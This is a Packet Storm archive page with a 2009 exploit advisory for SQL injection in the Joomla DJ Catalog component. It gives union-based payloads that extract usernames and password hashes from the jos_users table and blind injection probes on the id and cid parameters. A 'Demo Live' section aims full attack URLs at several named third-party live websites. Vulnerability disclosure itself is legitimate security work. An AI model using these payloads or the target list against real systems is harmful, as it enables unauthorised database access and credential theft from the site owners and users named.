exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla DJ Catalog SQL Injection

Joomla DJ Catalog SQL Injection
Posted Sep 16, 2009
Authored by Chip D3 Bi0s

The Joomla DJ Catalog component suffers from SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
SHA-256 | 6bc49068cbd57f3c0bc42ca2bb3b1bad277e2ae41621d6822a385ee4403e825e

Joomla DJ Catalog SQL Injection

Change Mirror Download
-----------------------------------------------------------------------------------------
joomla com_djcatalog component SQL/bsql Injection Multiple Vulnerability
-----------------------------------------------------------------------------------------

Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Date : 15 September 2009
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : DJ-Catalog directory
version : Beta
Developer : AndrzejH
License : GPL type : Non-Commercial
Date Added : 9 September 2009
Demo : http://addons.design-joomla.eu/djcat/
http://templates.design-joomla.eu/dj-mobile/
Download : http://www.design-joomla.eu/downloads/download/components/djcatalog-1.5.x/start-download.html
Description :

Dj catalog is a universal component which meets these expectations, may serve as a directory of products or specific galleries.
Thanks to a flexible structure can be easily customized to your individual visual requirements.

---------------------------------------------------------------------------


I.SQL injection (id)/(cid)
Poc/Exploit:
~~~~~~~~
(id)
http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=showItem&id=[Sqlinjection]
[Sqlinjection]: null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users

(cid)
index.php?option=com_djcatalog&view=show&cid=x[Sqlinjection]
x = valid cid
Sqlinjection] = +and+1=2+union+select+1,password,3,4+from+jos_users

Demo Live:
~~~~~~
(id)
http://templates.design-joomla.eu/dj-sailing/index.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users
http://www.codispasa.net/index.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users

(cid)
http://www.proforte.co.za/index.php?option=com_djcatalog&view=show&cid=5+and+1=0+union+select+1,password,3,4+from+jos_users



II.BSQL injection (id)/(cid)
Poc/Exploit:
~~~~~~~~
(id)
http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=showItem&id=[BSQL]

(cid)
http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=show&cid=x[BSQL]
x = valid cid

(blog&cid)
http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=show&layout=blog&cid=x[BSQL]
x = valid cid

Demo Live:
~~~~~~
(id)
http://acropolltda.com/index.php?option=com_djcatalog&view=showItem&id=1+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
http://www.serviproveer.com/index.php/diseno-web/diseno-grafico/components/modules/modules/mod_googlecurrencyconverter/templates/index.php?option=com_djcatalog&view=showItem&id=1+and+substring(@@version,1,1)=5


(cid)
http://templates.design-joomla.eu/dj-mobile/index.php?option=com_djcatalog&view=show&cid=1+and+substring(@@version,1,1)=5
http://acropolltda.com/index.php?option=com_djcatalog&view=show&cid=10+and+substring(@@version,1,1)=5

(blog&cid)
http://fifthelementorgone.com/index.php?option=com_djcatalog&view=show&layout=blog&cid=1+and+substring(@@version,1,1)=5
http://www.gamerszone.org/index.php?option=com_djcatalog&view=show&layout=blog&cid=10+and+substring(@@version,1,1)=5

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close